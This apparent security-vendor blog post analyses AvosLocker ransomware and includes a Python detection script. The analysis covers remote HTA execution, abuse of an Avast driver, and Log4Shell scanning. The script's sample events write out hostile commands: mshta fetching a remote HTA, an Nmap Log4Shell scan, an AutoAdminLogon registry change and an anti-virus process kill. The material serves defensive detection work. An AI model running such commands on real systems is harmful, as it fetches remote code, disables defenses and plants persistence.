Detect AvosLocker Ransomware: Abuses a Driver File to Disable Anti-Virus Protection, Scans for Log4Shell Vulnerability

Recent cybersecurity research has uncovered AvosLocker ransomware samples abusing the Avast Anti-Rootkit Driver file to disable anti-virus protection, which allows adversaries to evade detection and block defenses. AvosLocker is a relatively novel ransomware family that appeared in the cyber threat arena to replace the infamous REvil, one of the most active ransomware variants in 2021 until the official shutdown of its operators.

In this latest cyber-attack, AvosLocker ransomware has also been observed scanning a set of endpoints for Log4Shell, a notorious zero-day vulnerability in the Apache Log4j Java logging library that has compromised hundreds of millions of devices across the globe. The ransomware performs the Log4Shell scan using a malicious Nmap NSE script.

Detect AvosLocker Ransomware

The Sigma rules below, released by our perspicacious Threat Bounty developers Sittikorn Sangrattanapitak and Nattatorn Chuensangarun, allow for effortless detection of the latest attacks involving the AvosLocker ransomware:

Possible Trend Micro Apex One Termination on Windows (via process_creation)

Possible AvosLocker Ransomware Callback C&C Server via Log4Shell Vulnerability with NMAP Tool (via process_creation)

Possible Ransomware Persistence by Modifying Registry to Allows Automatic Login (via process_creation)

The increasing number and severity of ransomware incidents are creating an expanded attack surface, putting more users at risk each day. To stay up-to-date with detection content related to AvosLocker ransomware, register for the SOC Prime Platform. The View Detections button will take you to a wide library of dedicated rules translated to 25+ SIEM, EDR, and XDR solutions.

SOC Prime’s Threat Bounty Program welcomes both experienced and aspiring threat hunters to share their Sigma-based detection content in exchange for expert coaching and steady revenue.


AvosLocker Ransomware Analysis

First observed in July 2021 and operating under a Ransomware-as-a-Service (RaaS) model, AvosLocker ransomware targets the food and beverage sectors, tech and finance industries, telecom and government entities, with India, Canada, and the U.S. spotted as the top affected countries based on the malicious activity spanning half a year from July 2021 through February 2022. According to the joint Cybersecurity Advisory issued by the FBI and FinCEN, AvosLocker ransomware has also hit critical U.S. infrastructure, including financial services and government entities.

According to new research by Trend Micro security analysts, a new variant of AvosLocker ransomware began sweeping across the globe, standing out from other strains of this ransomware family as the first one to disable anti-virus solutions on the infected devices.

The most probable initial point of access is the Zoho ManageEngine ADSelfService Plus (ADSS) exploit. After gaining access, adversaries launch mshta.exe to remotely execute an HTML application (HTA) file from their C&C server. The HTA runs an obfuscated PowerShell script containing shellcode that allows it to connect to the server and run arbitrary commands on the host operating system. The PowerShell script also downloads and launches the remote desktop tool AnyDeskMSI, which is used to distribute the ransomware payload and the tools leveraged for further system compromise.

Apart from scanning for the infamous Log4Shell vulnerability, tracked as CVE-2021-44228, AvosLocker ransomware targets other unpatched vulnerabilities to penetrate a targeted network. This new variant misuses a driver file (the Avast Anti-Rootkit Driver) to disable anti-virus software and establish a stealthy presence. After disabling defenses, the AvosLocker operators transfer other tools, including Mimikatz and Impacket.

Adversaries use PDQ, a software deployment tool, to deliver a malicious batch script to a targeted system. The batch script has a broad range of features, including the ability to kill the processes of several Windows components, such as Windows Error Recovery or Windows Update, as well as to prevent security software from running in safe boot, create a new admin account, and run the malicious code to spread the infection.
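As an added illustration (not SOC Prime's Sigma rules and not code from the research cited above), the Python below runs a simple process_creation detection pass over constructed events that mirror the behaviours described in this analysis: mshta.exe fetching a remote HTA, an Nmap NSE scan for Log4Shell, a Winlogon AutoAdminLogon registry change for persistence, and termination of an anti-virus process. The event log lines, the example host names and the Trend Micro process names used in the last rule are all assumptions made for the example.

```python
import re

# Constructed process_creation events (not real telemetry) that mirror the
# attack chain described in the text. The hosts and process names are assumed.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe http://example.invalid/update.hta"},
    {"Image": r"C:\Tools\nmap.exe",
     "CommandLine": "nmap.exe -p 8080 --script log4shell 10.0.0.0/24"},
    {"Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon /t REG_SZ /d 1 /f'},
    {"Image": r"C:\Windows\System32\taskkill.exe",
     "CommandLine": "taskkill /F /IM ntrtscan.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe notes.txt"},  # benign control event
]

# Each rule: (name, image file name suffix, command-line regexes that must ALL match).
# The Apex One process names (ntrtscan, tmlisten, pccntmon) are an assumption.
RULES = [
    ("remote_hta_via_mshta", r"\mshta.exe", [r"https?://"]),
    ("nmap_nse_log4shell_scan", r"\nmap.exe", [r"--script", r"log4shell"]),
    ("autoadminlogon_persistence", r"\reg.exe", [r"\bwinlogon\b", r"autoadminlogon"]),
    ("apex_one_termination", r"\taskkill.exe", [r"ntrtscan\.exe|tmlisten\.exe|pccntmon\.exe"]),
]


def matches(rule, event):
    """True when the event's image ends with the rule's suffix and every
    command-line pattern is found (case-insensitive), like a Sigma 'all of' selection."""
    _, image_suffix, patterns = rule
    if not event["Image"].lower().endswith(image_suffix.lower()):
        return False
    cmd = event["CommandLine"]
    return all(re.search(p, cmd, re.IGNORECASE) for p in patterns)


def detect(events):
    """Return (rule_name, CommandLine) for every event that hits a rule."""
    hits = []
    for ev in events:
        for rule in RULES:
            if matches(rule, ev):
                hits.append((rule[0], ev["CommandLine"]))
    return hits


if __name__ == "__main__":
    for name, cmd in detect(SAMPLE_EVENTS):
        print(f"[{name}] {cmd}")
```

In a real pipeline the same selection logic would run in the SIEM over Sysmon Event ID 1 or Windows 4688 events, which is what the process_creation log source in the rule titles refers to.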

To stay current with the events pertaining to the cybersecurity industry, follow the SOC Prime blog. Looking for a trustworthy platform to distribute your detection content while promoting collaborative cyber defense? Join SOC Prime’s crowdsourcing program to share your Sigma and YARA rules with the community, drive positive change in cybersecurity, and earn a stable income for your contribution!
